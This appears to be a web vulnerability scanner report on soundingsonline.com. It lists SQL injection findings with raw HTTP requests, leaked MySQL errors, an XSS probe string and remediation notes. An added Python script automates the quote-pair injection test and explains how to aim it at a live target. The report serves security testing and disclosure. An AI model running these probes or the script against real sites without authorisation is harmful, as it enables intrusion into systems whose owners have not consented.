HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.101. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

Suppressing the error message only removes the error oracle; it does not fix the injection. The user-controlled input that reaches this statement (the request URI in these findings) should be passed to the database through parameterised queries rather than string concatenation. In addition, the application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.102. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that this parameter name is itself an earlier cross-site scripting probe that the crawler followed as a link; the single quotes it carries, not the script payload, are what break the statement, and the error fragment ending in '' AND cooki shows the same concatenated query as the other findings on this host.

The database appears to be MySQL.

Remediation detail

Suppressing the error message only removes the error oracle; it does not fix the injection. The user-controlled input that reaches this statement (the request URI in these findings) should be passed to the database through parameterised queries rather than string concatenation. In addition, the application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E' HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=lav3f1huhlc18qqits80hjrgg7; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:03:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E'' AND cooki' at line 1</font>
...[SNIP]...

1.103. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The reported fragment, 'and-new-york-jan?tmpl=component&print=1&page=' AND cookie_info='', is the remainder of the request path and query string after the injected quote, which shows that the full request URI is concatenated into the SQL statement; the path segment is only where the quote happened to be inserted.

The database appears to be MySQL.

Remediation detail

Suppressing the error message only removes the error oracle; it does not fix the injection. The user-controlled input that reaches this statement (the request URI in these findings) should be passed to the database through parameterised queries rather than string concatenation. In addition, the application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues'/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and-new-york-jan?tmpl=component&print=1&page=' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues''/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.104. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

Suppressing the error message only removes the error oracle; it does not fix the injection. The user-controlled input that reaches this statement (the request URI in these findings) should be passed to the database through parameterised queries rather than string concatenation. In addition, the application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news/mishaps-a-rescues'/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=m8vgi6a1mfd687lf7jouu8s291; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:03:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3' at line 1</font>
...[SNIP]...

1.105. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

Suppressing the error message only removes the error oracle; it does not fix the injection. The user-controlled input that reaches this statement (the request URI in these findings) should be passed to the database through parameterised queries rather than string concatenation. In addition, the application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan'?tmpl=component&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?tmpl=component&print=1&page=' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan''?tmpl=component&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.106. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

Suppressing the error message only removes the error oracle; it does not fix the injection. The user-controlled input that reaches this statement (the request URI in these findings) should be passed to the database through parameterised queries rather than string concatenation. In addition, the application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan'?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=a5subqjcjob8idi2bff81gl8t2; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:03:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E' AND' at line 1</font>
...[SNIP]...

1.107. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [count cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The count cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the count cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6'; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=1hojl696rbnphcmga5ld1cf013; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:03:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E' AND cookie' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6''; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
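
The single-quote / double-quote probe behind findings 1.107 and the following ones is easy to reproduce outside Burp. The script below is an added example written for this report, not code from the scanner or from the site: it parses the verbose MySQL error exactly as it appears in the responses above, runs the differential test (one quote must produce the error, the escaped form '' must make it disappear), and exercises it against a constructed stand-in endpoint whose query shape ("... AND cookie_info='...'") is guessed from the error fragments, so the table and column names are assumptions. The "near '...'" fragment is the unparsed remainder of the query, which MySQL cuts at 80 characters; the 80-character fragments in 1.106 and 1.110 are what tell you the whole request path and query string are being concatenated into the statement.

```python
import re

# Verbose MySQL parse error as leaked by the endpoints in this report. The
# "near '...'" fragment is the unparsed remainder of the statement, truncated
# by MySQL to 80 characters; it shows exactly where the input landed.
MYSQL_SYNTAX_ERROR = re.compile(
    r"You have an error in your SQL syntax;.*?"
    r"near '(?P<ctx>.*?)' at line (?P<line>\d+)",
    re.S,
)

# Copied verbatim from response 1 of finding 1.108 in this report.
REPORT_ERROR_LINE = (
    "<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> "
    "[<font color=000077>You have an error in your SQL syntax; check the manual "
    "that corresponds to your MySQL server version for the right syntax to use "
    "near '' AND cookie_info=''' at line 1</font>"
)


def sql_error_context(body):
    """Return (near_fragment, line) if the body leaks a MySQL syntax error, else None."""
    m = MYSQL_SYNTAX_ERROR.search(body)
    if m is None:
        return None
    return m.group("ctx"), int(m.group("line"))


def quote_pair_test(send, base_value):
    """Differential probe used for the findings above: a lone quote must break the
    statement and an escaped quote ('' inside a MySQL string literal) must restore
    it. `send(value)` returns the response body for that input. 'certain' = both
    conditions hold, 'firm' = only the error was seen, 'none' = nothing leaked."""
    single = sql_error_context(send(base_value + "'"))
    if single is None:
        return {"verdict": "none", "single": None, "double": None}
    double = sql_error_context(send(base_value + "''"))
    verdict = "certain" if double is None else "firm"
    return {"verdict": verdict, "single": single, "double": double}


def _first_stray_quote(s):
    """Index of the first quote that is not half of a '' escape pair, or -1."""
    i = 0
    while i < len(s):
        if s[i] == "'" and i + 1 < len(s) and s[i + 1] == "'":
            i += 2
        elif s[i] == "'":
            return i
        else:
            i += 1
    return -1


def vulnerable_endpoint(value, cookie="5"):
    """Constructed stand-in for the vulnerable page, not the site's code: it
    concatenates the raw input into a tracking query and echoes the MySQL error
    verbatim. Table and column names are assumptions guessed from the
    'AND cookie_info=' fragments in the report."""
    prefix = "SELECT id FROM visits WHERE uri='"
    query = prefix + value + "' AND cookie_info='" + cookie + "'"
    stray = _first_stray_quote(value)
    if stray == -1:
        return "<!DOCTYPE html ...><html>article body</html>"
    near = query[len(prefix) + stray:][:80]  # unparsed remainder, 80 chars as MySQL reports it
    return (
        "<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> "
        "[<font color=000077>You have an error in your SQL syntax; check the manual "
        "that corresponds to your MySQL server version for the right syntax to use "
        f"near '{near}' at line 1</font>"
    )


if __name__ == "__main__":
    print(sql_error_context(REPORT_ERROR_LINE))
    print(quote_pair_test(vulnerable_endpoint, "1"))
```

To point it at a live target, replace `vulnerable_endpoint` with a function that sends the value in the position under test (path segment, parameter name, or Cookie header, as the findings here vary) and returns the body. A leaked error on the lone quote alone is what Burp rates "Firm"; the disappearing error on '' is what upgrades it to "Certain", because it shows the input sits inside a quoted string literal rather than, say, being rejected by a filter.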

1.108. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
